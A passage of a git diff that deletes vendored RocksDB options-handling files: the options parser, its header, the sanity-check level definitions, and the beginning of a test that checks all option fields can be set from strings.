-        if (!s.ok()) {
-          return s;
-        }
-        if (opt_file_version[0] < 1) {
-          return Status::InvalidArgument(
-              "A valid options_file_version must be at least 1.");
-        }
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::ValidityCheck() {
-  if (!has_db_options_) {
-    return Status::Corruption(
-        "A RocksDB Option file must have a single DBOptions section");
-  }
-  if (!has_default_cf_options_) {
-    return Status::Corruption(
-        "A RocksDB Option file must have a single CFOptions:default section");
-  }
-
-  return Status::OK();
-}
-
-std::string RocksDBOptionsParser::TrimAndRemoveComment(const std::string& line,
-                                                       bool trim_only) {
-  size_t start = 0;
-  size_t end = line.size();
-
-  // we only support "#" style comment
-  if (!trim_only) {
-    size_t search_pos = 0;
-    while (search_pos < line.size()) {
-      size_t comment_pos = line.find('#', search_pos);
-      if (comment_pos == std::string::npos) {
-        break;
-      }
-      if (comment_pos == 0 || line[comment_pos - 1] != '\\') {
-        end = comment_pos;
-        break;
-      }
-      search_pos = comment_pos + 1;
-    }
-  }
-
-  while (start < end && isspace(line[start]) != 0) {
-    ++start;
-  }
-
-  // start < end implies end > 0.
-  while (start < end && isspace(line[end - 1]) != 0) {
-    --end;
-  }
-
-  if (start < end) {
-    return line.substr(start, end - start);
-  }
-
-  return "";
-}
-
-namespace {
-bool AreEqualDoubles(const double a, const double b) {
-  return (fabs(a - b) < 0.00001);
-}
-}  // namespace
-
-bool AreEqualOptions(
-    const char* opt1, const char* opt2, const OptionTypeInfo& type_info,
-    const std::string& opt_name,
-    const std::unordered_map<std::string, std::string>* opt_map) {
-  const char* offset1 = opt1 + type_info.offset;
-  const char* offset2 = opt2 + type_info.offset;
-
-  switch (type_info.type) {
-    case OptionType::kBoolean:
-      return (*reinterpret_cast<const bool*>(offset1) ==
-              *reinterpret_cast<const bool*>(offset2));
-    case OptionType::kInt:
-      return (*reinterpret_cast<const int*>(offset1) ==
-              *reinterpret_cast<const int*>(offset2));
-    case OptionType::kVectorInt:
-      return (*reinterpret_cast<const std::vector<int>*>(offset1) ==
-              *reinterpret_cast<const std::vector<int>*>(offset2));
-    case OptionType::kUInt:
-      return (*reinterpret_cast<const unsigned int*>(offset1) ==
-              *reinterpret_cast<const unsigned int*>(offset2));
-    case OptionType::kUInt32T:
-      return (*reinterpret_cast<const uint32_t*>(offset1) ==
-              *reinterpret_cast<const uint32_t*>(offset2));
-    case OptionType::kUInt64T:
-      {
-        uint64_t v1, v2;
-        GetUnaligned(reinterpret_cast<const uint64_t*>(offset1), &v1);
-        GetUnaligned(reinterpret_cast<const uint64_t*>(offset2), &v2);
-        return (v1 == v2);
-      }
-    case OptionType::kSizeT:
-      {
-        size_t v1, v2;
-        GetUnaligned(reinterpret_cast<const size_t*>(offset1), &v1);
-        GetUnaligned(reinterpret_cast<const size_t*>(offset2), &v2);
-        return (v1 == v2);
-      }
-    case OptionType::kString:
-      return (*reinterpret_cast<const std::string*>(offset1) ==
-              *reinterpret_cast<const std::string*>(offset2));
-    case OptionType::kDouble:
-      return AreEqualDoubles(*reinterpret_cast<const double*>(offset1),
-                             *reinterpret_cast<const double*>(offset2));
-    case OptionType::kCompactionStyle:
-      return (*reinterpret_cast<const CompactionStyle*>(offset1) ==
-              *reinterpret_cast<const CompactionStyle*>(offset2));
-    case OptionType::kCompactionPri:
-      return (*reinterpret_cast<const CompactionPri*>(offset1) ==
-              *reinterpret_cast<const CompactionPri*>(offset2));
-    case OptionType::kCompressionType:
-      return (*reinterpret_cast<const CompressionType*>(offset1) ==
-              *reinterpret_cast<const CompressionType*>(offset2));
-    case OptionType::kVectorCompressionType: {
-      const auto* vec1 =
-          reinterpret_cast<const std::vector<CompressionType>*>(offset1);
-      const auto* vec2 =
-          reinterpret_cast<const std::vector<CompressionType>*>(offset2);
-      return (*vec1 == *vec2);
-    }
-    case OptionType::kChecksumType:
-      return (*reinterpret_cast<const ChecksumType*>(offset1) ==
-              *reinterpret_cast<const ChecksumType*>(offset2));
-    case OptionType::kBlockBasedTableIndexType:
-      return (
-          *reinterpret_cast<const BlockBasedTableOptions::IndexType*>(
-              offset1) ==
-          *reinterpret_cast<const BlockBasedTableOptions::IndexType*>(offset2));
-    case OptionType::kWALRecoveryMode:
-      return (*reinterpret_cast<const WALRecoveryMode*>(offset1) ==
-              *reinterpret_cast<const WALRecoveryMode*>(offset2));
-    case OptionType::kAccessHint:
-      return (*reinterpret_cast<const DBOptions::AccessHint*>(offset1) ==
-              *reinterpret_cast<const DBOptions::AccessHint*>(offset2));
-    case OptionType::kInfoLogLevel:
-      return (*reinterpret_cast<const InfoLogLevel*>(offset1) ==
-              *reinterpret_cast<const InfoLogLevel*>(offset2));
-    default:
-      if (type_info.verification == OptionVerificationType::kByName ||
-          type_info.verification == OptionVerificationType::kByNameAllowNull) {
-        std::string value1;
-        bool result =
-            SerializeSingleOptionHelper(offset1, type_info.type, &value1);
-        if (result == false) {
-          return false;
-        }
-        if (opt_map == nullptr) {
-          return true;
-        }
-        auto iter = opt_map->find(opt_name);
-        if (iter == opt_map->end()) {
-          return true;
-        } else {
-          if (type_info.verification ==
-              OptionVerificationType::kByNameAllowNull) {
-            if (iter->second == kNullptrString || value1 == kNullptrString) {
-              return true;
-            }
-          }
-          return (value1 == iter->second);
-        }
-      }
-      return false;
-  }
-}
-
-Status RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-    const DBOptions& db_opt, const std::vector<std::string>& cf_names,
-    const std::vector<ColumnFamilyOptions>& cf_opts,
-    const std::string& file_name, Env* env,
-    OptionsSanityCheckLevel sanity_check_level, bool ignore_unknown_options) {
-  RocksDBOptionsParser parser;
-  std::unique_ptr<SequentialFile> seq_file;
-  Status s = parser.Parse(file_name, env, ignore_unknown_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Verify DBOptions
-  s = VerifyDBOptions(db_opt, *parser.db_opt(), parser.db_opt_map(),
-                      sanity_check_level);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Verify ColumnFamily Name
-  if (cf_names.size() != parser.cf_names()->size()) {
-    if (sanity_check_level >= kSanityLevelLooselyCompatible) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionParser Error] The persisted options does not have "
-          "the same number of column family names as the db instance.");
-    } else if (cf_opts.size() > parser.cf_opts()->size()) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionsParser Error]",
-          "The persisted options file has less number of column family "
-          "names than that of the specified one.");
-    }
-  }
-  for (size_t i = 0; i < cf_names.size(); ++i) {
-    if (cf_names[i] != parser.cf_names()->at(i)) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionParser Error] The persisted options and the db"
-          "instance does not have the same name for column family ",
-          ToString(i));
-    }
-  }
-
-  // Verify Column Family Options
-  if (cf_opts.size() != parser.cf_opts()->size()) {
-    if (sanity_check_level >= kSanityLevelLooselyCompatible) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionsParser Error]",
-          "The persisted options does not have the same number of "
-          "column families as the db instance.");
-    } else if (cf_opts.size() > parser.cf_opts()->size()) {
-      return Status::InvalidArgument(
-          "[RocksDBOptionsParser Error]",
-          "The persisted options file has less number of column families "
-          "than that of the specified number.");
-    }
-  }
-  for (size_t i = 0; i < cf_opts.size(); ++i) {
-    s = VerifyCFOptions(cf_opts[i], parser.cf_opts()->at(i),
-                        &(parser.cf_opt_maps()->at(i)), sanity_check_level);
-    if (!s.ok()) {
-      return s;
-    }
-    s = VerifyTableFactory(cf_opts[i].table_factory.get(),
-                           parser.cf_opts()->at(i).table_factory.get(),
-                           sanity_check_level);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::VerifyDBOptions(
-    const DBOptions& base_opt, const DBOptions& persisted_opt,
-    const std::unordered_map<std::string, std::string>* opt_map,
-    OptionsSanityCheckLevel sanity_check_level) {
-  for (auto pair : db_options_type_info) {
-    if (pair.second.verification == OptionVerificationType::kDeprecated) {
-      // We skip checking deprecated variables as they might
-      // contain random values since they might not be initialized
-      continue;
-    }
-    if (DBOptionSanityCheckLevel(pair.first) <= sanity_check_level) {
-      if (!AreEqualOptions(reinterpret_cast<const char*>(&base_opt),
-                           reinterpret_cast<const char*>(&persisted_opt),
-                           pair.second, pair.first, nullptr)) {
-        const size_t kBufferSize = 2048;
-        char buffer[kBufferSize];
-        std::string base_value;
-        std::string persisted_value;
-        SerializeSingleOptionHelper(
-            reinterpret_cast<const char*>(&base_opt) + pair.second.offset,
-            pair.second.type, &base_value);
-        SerializeSingleOptionHelper(
-            reinterpret_cast<const char*>(&persisted_opt) + pair.second.offset,
-            pair.second.type, &persisted_value);
-        snprintf(buffer, sizeof(buffer),
-                 "[RocksDBOptionsParser]: "
-                 "failed the verification on DBOptions::%s --- "
-                 "The specified one is %s while the persisted one is %s.\n",
-                 pair.first.c_str(), base_value.c_str(),
-                 persisted_value.c_str());
-        return Status::InvalidArgument(Slice(buffer, strlen(buffer)));
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::VerifyCFOptions(
-    const ColumnFamilyOptions& base_opt,
-    const ColumnFamilyOptions& persisted_opt,
-    const std::unordered_map<std::string, std::string>* persisted_opt_map,
-    OptionsSanityCheckLevel sanity_check_level) {
-  for (auto& pair : cf_options_type_info) {
-    if (pair.second.verification == OptionVerificationType::kDeprecated) {
-      // We skip checking deprecated variables as they might
-      // contain random values since they might not be initialized
-      continue;
-    }
-    if (CFOptionSanityCheckLevel(pair.first) <= sanity_check_level) {
-      if (!AreEqualOptions(reinterpret_cast<const char*>(&base_opt),
-                           reinterpret_cast<const char*>(&persisted_opt),
-                           pair.second, pair.first, persisted_opt_map)) {
-        const size_t kBufferSize = 2048;
-        char buffer[kBufferSize];
-        std::string base_value;
-        std::string persisted_value;
-        SerializeSingleOptionHelper(
-            reinterpret_cast<const char*>(&base_opt) + pair.second.offset,
-            pair.second.type, &base_value);
-        SerializeSingleOptionHelper(
-            reinterpret_cast<const char*>(&persisted_opt) + pair.second.offset,
-            pair.second.type, &persisted_value);
-        snprintf(buffer, sizeof(buffer),
-                 "[RocksDBOptionsParser]: "
-                 "failed the verification on ColumnFamilyOptions::%s --- "
-                 "The specified one is %s while the persisted one is %s.\n",
-                 pair.first.c_str(), base_value.c_str(),
-                 persisted_value.c_str());
-        return Status::InvalidArgument(Slice(buffer, sizeof(buffer)));
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status RocksDBOptionsParser::VerifyTableFactory(
-    const TableFactory* base_tf, const TableFactory* file_tf,
-    OptionsSanityCheckLevel sanity_check_level) {
-  if (base_tf && file_tf) {
-    if (sanity_check_level > kSanityLevelNone &&
-        std::string(base_tf->Name()) != std::string(file_tf->Name())) {
-      return Status::Corruption(
-          "[RocksDBOptionsParser]: "
-          "failed the verification on TableFactory->Name()");
-    }
-    if (base_tf->Name() == BlockBasedTableFactory::kName) {
-      return VerifyBlockBasedTableFactory(
-          static_cast_with_check<const BlockBasedTableFactory,
-                                 const TableFactory>(base_tf),
-          static_cast_with_check<const BlockBasedTableFactory,
-                                 const TableFactory>(file_tf),
-          sanity_check_level);
-    }
-    // TODO(yhchiang): add checks for other table factory types
-  } else {
-    // TODO(yhchiang): further support sanity check here
-  }
-  return Status::OK();
-}
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/options/options_parser.h b/thirdparty/rocksdb/options/options_parser.h
deleted file mode 100644
index 5545c0b..0000000
--- a/thirdparty/rocksdb/options/options_parser.h
+++ /dev/null
@@ -1,146 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <map>
-#include <string>
-#include <vector>
-
-#include "options/options_helper.h"
-#include "options/options_sanity_check.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "table/block_based_table_factory.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-#define ROCKSDB_OPTION_FILE_MAJOR 1
-#define ROCKSDB_OPTION_FILE_MINOR 1
-
-enum OptionSection : char {
-  kOptionSectionVersion = 0,
-  kOptionSectionDBOptions,
-  kOptionSectionCFOptions,
-  kOptionSectionTableOptions,
-  kOptionSectionUnknown
-};
-
-static const std::string opt_section_titles[] = {
-    "Version", "DBOptions", "CFOptions", "TableOptions/", "Unknown"};
-
-Status PersistRocksDBOptions(const DBOptions& db_opt,
-                             const std::vector<std::string>& cf_names,
-                             const std::vector<ColumnFamilyOptions>& cf_opts,
-                             const std::string& file_name, Env* env);
-
-extern bool AreEqualOptions(
-    const char* opt1, const char* opt2, const OptionTypeInfo& type_info,
-    const std::string& opt_name,
-    const std::unordered_map<std::string, std::string>* opt_map);
-
-class RocksDBOptionsParser {
- public:
-  explicit RocksDBOptionsParser();
-  ~RocksDBOptionsParser() {}
-  void Reset();
-
-  Status Parse(const std::string& file_name, Env* env,
-               bool ignore_unknown_options = false);
-  static std::string TrimAndRemoveComment(const std::string& line,
-                                          const bool trim_only = false);
-
-  const DBOptions* db_opt() const { return &db_opt_; }
-  const std::unordered_map<std::string, std::string>* db_opt_map() const {
-    return &db_opt_map_;
-  }
-  const std::vector<ColumnFamilyOptions>* cf_opts() const { return &cf_opts_; }
-  const std::vector<std::string>* cf_names() const { return &cf_names_; }
-  const std::vector<std::unordered_map<std::string, std::string>>* cf_opt_maps()
-      const {
-    return &cf_opt_maps_;
-  }
-
-  const ColumnFamilyOptions* GetCFOptions(const std::string& name) {
-    return GetCFOptionsImpl(name);
-  }
-  size_t NumColumnFamilies() { return cf_opts_.size(); }
-
-  static Status VerifyRocksDBOptionsFromFile(
-      const DBOptions& db_opt, const std::vector<std::string>& cf_names,
-      const std::vector<ColumnFamilyOptions>& cf_opts,
-      const std::string& file_name, Env* env,
-      OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch,
-      bool ignore_unknown_options = false);
-
-  static Status VerifyDBOptions(
-      const DBOptions& base_opt, const DBOptions& new_opt,
-      const std::unordered_map<std::string, std::string>* new_opt_map = nullptr,
-      OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch);
-
-  static Status VerifyCFOptions(
-      const ColumnFamilyOptions& base_opt, const ColumnFamilyOptions& new_opt,
-      const std::unordered_map<std::string, std::string>* new_opt_map = nullptr,
-      OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch);
-
-  static Status VerifyTableFactory(
-      const TableFactory* base_tf, const TableFactory* file_tf,
-      OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch);
-
-  static Status ExtraParserCheck(const RocksDBOptionsParser& input_parser);
-
- protected:
-  bool IsSection(const std::string& line);
-  Status ParseSection(OptionSection* section, std::string* title,
-                      std::string* argument, const std::string& line,
-                      const int line_num);
-
-  Status CheckSection(const OptionSection section,
-                      const std::string& section_arg, const int line_num);
-
-  Status ParseStatement(std::string* name, std::string* value,
-                        const std::string& line, const int line_num);
-
-  Status EndSection(const OptionSection section, const std::string& title,
-                    const std::string& section_arg,
-                    const std::unordered_map<std::string, std::string>& opt_map,
-                    bool ignore_unknown_options);
-
-  Status ValidityCheck();
-
-  Status InvalidArgument(const int line_num, const std::string& message);
-
-  Status ParseVersionNumber(const std::string& ver_name,
-                            const std::string& ver_string, const int max_count,
-                            int* version);
-
-  ColumnFamilyOptions* GetCFOptionsImpl(const std::string& name) {
-    assert(cf_names_.size() == cf_opts_.size());
-    for (size_t i = 0; i < cf_names_.size(); ++i) {
-      if (cf_names_[i] == name) {
-        return &cf_opts_[i];
-      }
-    }
-    return nullptr;
-  }
-
- private:
-  DBOptions db_opt_;
-  std::unordered_map<std::string, std::string> db_opt_map_;
-  std::vector<std::string> cf_names_;
-  std::vector<ColumnFamilyOptions> cf_opts_;
-  std::vector<std::unordered_map<std::string, std::string>> cf_opt_maps_;
-  bool has_version_section_;
-  bool has_db_options_;
-  bool has_default_cf_options_;
-  int db_version[3];
-  int opt_file_version[3];
-};
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options_sanity_check.cc b/thirdparty/rocksdb/options/options_sanity_check.cc
deleted file mode 100644
index d3afcc0..0000000
--- a/thirdparty/rocksdb/options/options_sanity_check.cc
+++ /dev/null
@@ -1,38 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "options/options_sanity_check.h"
-
-namespace rocksdb {
-
-namespace {
-OptionsSanityCheckLevel SanityCheckLevelHelper(
-    const std::unordered_map<std::string, OptionsSanityCheckLevel>& smap,
-    const std::string& name) {
-  auto iter = smap.find(name);
-  return iter != smap.end() ? iter->second : kSanityLevelExactMatch;
-}
-}
-
-OptionsSanityCheckLevel DBOptionSanityCheckLevel(
-    const std::string& option_name) {
-  return SanityCheckLevelHelper(sanity_level_db_options, option_name);
-}
-
-OptionsSanityCheckLevel CFOptionSanityCheckLevel(
-    const std::string& option_name) {
-  return SanityCheckLevelHelper(sanity_level_cf_options, option_name);
-}
-
-OptionsSanityCheckLevel BBTOptionSanityCheckLevel(
-    const std::string& option_name) {
-  return SanityCheckLevelHelper(sanity_level_bbt_options, option_name);
-}
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/options/options_sanity_check.h b/thirdparty/rocksdb/options/options_sanity_check.h
deleted file mode 100644
index 118fdd2..0000000
--- a/thirdparty/rocksdb/options/options_sanity_check.h
+++ /dev/null
@@ -1,48 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <unordered_map>
-
-#ifndef ROCKSDB_LITE
-namespace rocksdb {
-// This enum defines the RocksDB options sanity level.
-enum OptionsSanityCheckLevel : unsigned char {
-  // Performs no sanity check at all.
-  kSanityLevelNone = 0x00,
-  // Performs minimum check to ensure the RocksDB instance can be
-  // opened without corrupting / mis-interpreting the data.
-  kSanityLevelLooselyCompatible = 0x01,
-  // Perform exact match sanity check.
-  kSanityLevelExactMatch = 0xFF,
-};
-
-// The sanity check level for DB options
-static const std::unordered_map<std::string, OptionsSanityCheckLevel>
-    sanity_level_db_options {};
-
-// The sanity check level for column-family options
-static const std::unordered_map<std::string, OptionsSanityCheckLevel>
-    sanity_level_cf_options = {
-        {"comparator", kSanityLevelLooselyCompatible},
-        {"table_factory", kSanityLevelLooselyCompatible},
-        {"merge_operator", kSanityLevelLooselyCompatible}};
-
-// The sanity check level for block-based table options
-static const std::unordered_map<std::string, OptionsSanityCheckLevel>
-    sanity_level_bbt_options {};
-
-OptionsSanityCheckLevel DBOptionSanityCheckLevel(
-    const std::string& options_name);
-OptionsSanityCheckLevel CFOptionSanityCheckLevel(
-    const std::string& options_name);
-OptionsSanityCheckLevel BBTOptionSanityCheckLevel(
-    const std::string& options_name);
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/options/options_settable_test.cc b/thirdparty/rocksdb/options/options_settable_test.cc
deleted file mode 100644
index ab9989f..0000000
--- a/thirdparty/rocksdb/options/options_settable_test.cc
+++ /dev/null
@@ -1,454 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <cstring>
-
-#include "options/options_parser.h"
-#include "rocksdb/convenience.h"
-#include "util/testharness.h"
-
-#ifndef GFLAGS
-bool FLAGS_enable_print = false;
-#else
-#include <gflags/gflags.h>
-using GFLAGS::ParseCommandLineFlags;
-DEFINE_bool(enable_print, false, "Print options generated to console.");
-#endif  // GFLAGS
-
-namespace rocksdb {
-
-// Verify options are settable from options strings.
-// We take the approach that depends on compiler behavior that copy constructor
-// won't touch implicit padding bytes, so that the test is fragile.
-// As a result, we only run the tests to verify new fields in options are
-// settable through string on limited platforms as it depends on behavior of
-// compilers.
-#ifndef ROCKSDB_LITE
-#if defined OS_LINUX || defined OS_WIN
-#ifndef __clang__
-
-class OptionsSettableTest : public testing::Test {
- public:
-  OptionsSettableTest() {}
-};
-
-const char kSpecialChar = 'z';
-typedef std::vector<std::pair<size_t, size_t>> OffsetGap;
-
-void FillWithSpecialChar(char* start_ptr, size_t total_size,
-                         const OffsetGap& blacklist) {
-  size_t offset = 0;
-  for (auto& pair : blacklist) {
-    std::memset(start_ptr + offset, kSpecialChar, pair.first - offset);
-    offset = pair.first + pair.second;
-  }
-  std::memset(start_ptr + offset, kSpecialChar, total_size - offset);
-}
-
-int NumUnsetBytes(char* start_ptr, size_t total_size,
-                  const OffsetGap& blacklist) {
-  int total_unset_bytes_base = 0;
-  size_t offset = 0;
-  for (auto& pair : blacklist) {
-    for (char* ptr = start_ptr + offset; ptr < start_ptr + pair.first; ptr++) {
-      if (*ptr == kSpecialChar) {
-        total_unset_bytes_base++;
-      }
-    }
-    offset = pair.first + pair.second;
-  }
-  for (char* ptr = start_ptr + offset; ptr < start_ptr + total_size; ptr++) {
-    if (*ptr == kSpecialChar) {
-      total_unset_bytes_base++;
-    }
-  }
-  return total_unset_bytes_base;
-}
-
-// If the test fails, likely a new option is added to BlockBasedTableOptions
-// but it cannot be set through GetBlockBasedTableOptionsFromString(), or the
-// test is not updated accordingly.
-// After adding an option, we need to make sure it is settable by
-// GetBlockBasedTableOptionsFromString() and add the option to the input string
-// passed to the GetBlockBasedTableOptionsFromString() in this test.
-// If it is a complicated type, you also need to add the field to
-// kBbtoBlacklist, and maybe add customized verification for it.
-TEST_F(OptionsSettableTest, BlockBasedTableOptionsAllFieldsSettable) {
-  // Items in the form of <offset, size>. Need to be in ascending order
-  // and not overlapping. Need to updated if new pointer-option is added.
-  const OffsetGap kBbtoBlacklist = {
-      {offsetof(struct BlockBasedTableOptions, flush_block_policy_factory),
-       sizeof(std::shared_ptr<FlushBlockPolicyFactory>)},
-      {offsetof(struct BlockBasedTableOptions, block_cache),
-       sizeof(std::shared_ptr<Cache>)},
-      {offsetof(struct BlockBasedTableOptions, persistent_cache),
-       sizeof(std::shared_ptr<PersistentCache>)},
-      {offsetof(struct BlockBasedTableOptions, block_cache_compressed),
-       sizeof(std::shared_ptr<Cache>)},
-      {offsetof(struct BlockBasedTableOptions, filter_policy),
-       sizeof(std::shared_ptr<const FilterPolicy>)},
-  };
-
-  // In this test, we catch a new option of BlockBasedTableOptions that is not
-  // settable through GetBlockBasedTableOptionsFromString().
-  // We count padding bytes of the option struct, and assert it to be the same
-  // as unset bytes of an option struct initialized by
-  // GetBlockBasedTableOptionsFromString().
-
-  char* bbto_ptr = new char[sizeof(BlockBasedTableOptions)];
-
-  // Count padding bytes by setting all bytes in the memory to a special char,
-  // copy a well constructed struct to this memory and see how many special
-  // bytes left.
-  BlockBasedTableOptions* bbto = new (bbto_ptr) BlockBasedTableOptions();
-  FillWithSpecialChar(bbto_ptr, sizeof(BlockBasedTableOptions), kBbtoBlacklist);
-  // It based on the behavior of compiler that padding bytes are not changed
-  // when copying the struct. It's prone to failure when compiler behavior
-  // changes. We verify there is unset bytes to detect the case.
-  *bbto = BlockBasedTableOptions();
-  int unset_bytes_base =
-      NumUnsetBytes(bbto_ptr, sizeof(BlockBasedTableOptions), kBbtoBlacklist);
-  ASSERT_GT(unset_bytes_base, 0);
-  bbto->~BlockBasedTableOptions();
-
-  // Construct the base option passed into
-  // GetBlockBasedTableOptionsFromString().
-  bbto = new (bbto_ptr) BlockBasedTableOptions();
-  FillWithSpecialChar(bbto_ptr, sizeof(BlockBasedTableOptions), kBbtoBlacklist);
-  // This option is not setable:
-  bbto->use_delta_encoding = true;
-
-  char* new_bbto_ptr = new char[sizeof(BlockBasedTableOptions)];
-  BlockBasedTableOptions* new_bbto =
-      new (new_bbto_ptr) BlockBasedTableOptions();
-  FillWithSpecialChar(new_bbto_ptr, sizeof(BlockBasedTableOptions),
-                      kBbtoBlacklist);
-
-  // Need to update the option string if a new option is added.
-  ASSERT_OK(GetBlockBasedTableOptionsFromString(
-      *bbto,
-      "cache_index_and_filter_blocks=1;"
-      "cache_index_and_filter_blocks_with_high_priority=true;"
-      "pin_l0_filter_and_index_blocks_in_cache=1;"
-      "index_type=kHashSearch;"
-      "checksum=kxxHash;hash_index_allow_collision=1;no_block_cache=1;"
-      "block_cache=1M;block_cache_compressed=1k;block_size=1024;"
-      "block_size_deviation=8;block_restart_interval=4; "
-      "metadata_block_size=1024;"
-      "partition_filters=false;"
-      "index_block_restart_interval=4;"
-      "filter_policy=bloomfilter:4:true;whole_key_filtering=1;"
-      "format_version=1;"
-      "hash_index_allow_collision=false;"
-      "verify_compression=true;read_amp_bytes_per_bit=0",
-      new_bbto));
-
-  ASSERT_EQ(unset_bytes_base,
-            NumUnsetBytes(new_bbto_ptr, sizeof(BlockBasedTableOptions),
-                          kBbtoBlacklist));
-
-  ASSERT_TRUE(new_bbto->block_cache.get() != nullptr);
-  ASSERT_TRUE(new_bbto->block_cache_compressed.get() != nullptr);
-  ASSERT_TRUE(new_bbto->filter_policy.get() != nullptr);
-
-  bbto->~BlockBasedTableOptions();
-  new_bbto->~BlockBasedTableOptions();
-
-  delete[] bbto_ptr;
-  delete[] new_bbto_ptr;
-}
-
-// If the test fails, likely a new option is added to DBOptions
-// but it cannot be set through GetDBOptionsFromString(), or the test is not
-// updated accordingly.
-// After adding an option, we need to make sure it is settable by
-// GetDBOptionsFromString() and add the option to the input string passed to
-// DBOptionsFromString()in this test.
-// If it is a complicated type, you also need to add the field to
-// kDBOptionsBlacklist, and maybe add customized verification for it.
-TEST_F(OptionsSettableTest, DBOptionsAllFieldsSettable) {
-  const OffsetGap kDBOptionsBlacklist = {
-      {offsetof(struct DBOptions, env), sizeof(Env*)},
-      {offsetof(struct DBOptions, rate_limiter),
-       sizeof(std::shared_ptr<RateLimiter>)},
-      {offsetof(struct DBOptions, sst_file_manager),
-       sizeof(std::shared_ptr<SstFileManager>)},
-      {offsetof(struct DBOptions, info_log), sizeof(std::shared_ptr<Logger>)},
-      {offsetof(struct DBOptions, statistics),
-       sizeof(std::shared_ptr<Statistics>)},
-      {offsetof(struct DBOptions, db_paths), sizeof(std::vector<DbPath>)},
-      {offsetof(struct DBOptions, db_log_dir), sizeof(std::string)},
-      {offsetof(struct DBOptions, wal_dir), sizeof(std::string)},
-      {offsetof(struct DBOptions, write_buffer_manager),
-       sizeof(std::shared_ptr<WriteBufferManager>)},
-      {offsetof(struct DBOptions, listeners),
-       sizeof(std::vector<std::shared_ptr<EventListener>>)},
-      {offsetof(struct DBOptions, row_cache), sizeof(std::shared_ptr<Cache>)},
-      {offsetof(struct DBOptions, wal_filter), sizeof(const WalFilter*)},
-  };
-
-  char* options_ptr = new char[sizeof(DBOptions)];
-
-  // Count padding bytes by setting all bytes in the memory to a special char,
-  // copy a well constructed struct to this memory and see how many special
-  // bytes left.
-  DBOptions* options = new (options_ptr) DBOptions();
-  FillWithSpecialChar(options_ptr, sizeof(DBOptions), kDBOptionsBlacklist);
-  // It based on the behavior of compiler that padding bytes are not changed
-  // when copying the struct. It's prone to failure when compiler behavior
-  // changes. We verify there is unset bytes to detect the case.
-  *options = DBOptions();
-  int unset_bytes_base =
-      NumUnsetBytes(options_ptr, sizeof(DBOptions), kDBOptionsBlacklist);
-  ASSERT_GT(unset_bytes_base, 0);
-  options->~DBOptions();
-
-  options = new (options_ptr) DBOptions();
-  FillWithSpecialChar(options_ptr, sizeof(DBOptions), kDBOptionsBlacklist);
-
-  char* new_options_ptr = new char[sizeof(DBOptions)];
-  DBOptions* new_options = new (new_options_ptr) DBOptions();
-  FillWithSpecialChar(new_options_ptr, sizeof(DBOptions), kDBOptionsBlacklist);
-
-  // Need to update the option string if a new option is added.
-  ASSERT_OK(
-      GetDBOptionsFromString(*options,
-                             "wal_bytes_per_sync=4295048118;"
-                             "delete_obsolete_files_period_micros=4294967758;"
-                             "WAL_ttl_seconds=4295008036;"
-                             "WAL_size_limit_MB=4295036161;"
-                             "wal_dir=path/to/wal_dir;"
-                             "db_write_buffer_size=2587;"
-                             "max_subcompactions=64330;"
-                             "table_cache_numshardbits=28;"
-                             "max_open_files=72;"
-                             "max_file_opening_threads=35;"
-                             "max_background_jobs=8;"
-                             "base_background_compactions=3;"
-                             "max_background_compactions=33;"
-                             "use_fsync=true;"
-                             "use_adaptive_mutex=false;"
-                             "max_total_wal_size=4295005604;"
-                             "compaction_readahead_size=0;"
-                             "new_table_reader_for_compaction_inputs=false;"
-                             "keep_log_file_num=4890;"
-                             "skip_stats_update_on_db_open=false;"
-                             "max_manifest_file_size=4295009941;"
-                             "db_log_dir=path/to/db_log_dir;"
-                             "skip_log_error_on_recovery=true;"
-                             "writable_file_max_buffer_size=1048576;"
-                             "paranoid_checks=true;"
-                             "is_fd_close_on_exec=false;"
-                             "bytes_per_sync=4295013613;"
-                             "enable_thread_tracking=false;"
-                             "recycle_log_file_num=0;"
-                             "create_missing_column_families=true;"
